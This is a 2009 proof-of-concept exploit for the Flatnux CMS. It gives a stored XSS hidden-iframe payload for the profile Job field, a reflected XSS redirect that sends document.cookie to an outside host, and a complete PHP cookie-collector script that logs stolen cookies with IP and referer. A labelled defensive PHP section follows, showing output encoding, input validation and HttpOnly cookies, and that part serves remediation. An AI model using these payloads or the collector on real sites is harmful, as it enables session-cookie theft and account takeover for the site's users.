Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC
Source: www.vfcocus.net  Author: Alfons  Published: 2009-02-03

/*
  - Flatnux-2009-01-27 XSS/Iframe injection p0c
  + 1] Create account
  + 2] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
       - Set iframe in the Job fields      
         (Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>)
  + 3] Now m4k3 frieNdship with Sheep

  Greetings : cOndemned , sid.psycho , everyone whose nicks can't be pronounced :P
              and Biggest 4 g0rion l0l

  "... the road is more important than the destination .... :P"
  http://www.wrzuta.pl/audio/iL4UkPk6YK/
  Alfons Luja
*/      
           

<script type="text/javascript">
          path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
          location.href =  path;
</script>


/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
  if(isset($_GET['kuka'])){
     $gethim = $_GET['kuka'];
     $data = "KUKI_GRABER:\n";
     $data.= date("dmY H:i:s")."\n";
     $data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n";
     $data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n";
     $data.= "CIACHO: ".$gethim."\n";
     $hnd = fopen("KUKI_FLATNUX.TXT","a");
      if(!$hnd) exit(666);
         flock($hnd,LOCK_EX);
         fwrite($hnd,$data);
         flock($hnd,LOCK_UN);
         fclose($hnd);
  }
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
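
Both injection points in the PoC, the stored Job profile field and the reflected mod parameter, exist because user input reaches the HTML response unencoded. The PHP below is an added example showing the corresponding output encoding and input validation; it is not Flatnux code or part of the original PoC, and the helper names esc_html() and safe_module_name(), the module-name pattern, the 'home' default and the use of PHP native sessions are assumptions.

```php
<?php
// Added example: hypothetical helpers, not taken from the Flatnux source.

// Assumption: the application uses PHP native sessions. HttpOnly keeps the
// session cookie out of document.cookie, which the PoC redirect reads.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);

/**
 * Encode a user-controlled value for output as HTML text or inside a
 * quoted attribute. ENT_QUOTES covers both " and '.
 */
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Accept the mod parameter only if it looks like a module name.
 * Assumed pattern: letters, digits and underscore, as in "02_Flatforum".
 */
function safe_module_name(?string $mod, string $default = 'home'): string
{
    if ($mod !== null && preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $mod) === 1) {
        return $mod;
    }
    return $default;
}

// Constructed sample inputs mirroring the two payload shapes in the PoC
// (attacker.example is a placeholder host).
$job = 'Jobless<iframe src=http://attacker.example/x.php style="visibility:hidden"></iframe>';
$mod = '02_Flatforum"><script>location.href="http://attacker.example/c.php?kuka="+document.cookie;</script>';

// Stored case: the Job field is rendered as inert text, not as an iframe.
echo '<td>' . esc_html($job) . "</td>\n";

// Reflected case: the malformed module name is rejected, and the value that
// is echoed back into the attribute is encoded anyway (defence in depth).
$module = safe_module_name($mod);
echo '<a href="index.php?mod=' . esc_html(rawurlencode($module)) . '">'
    . esc_html($module) . "</a>\n";
```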


 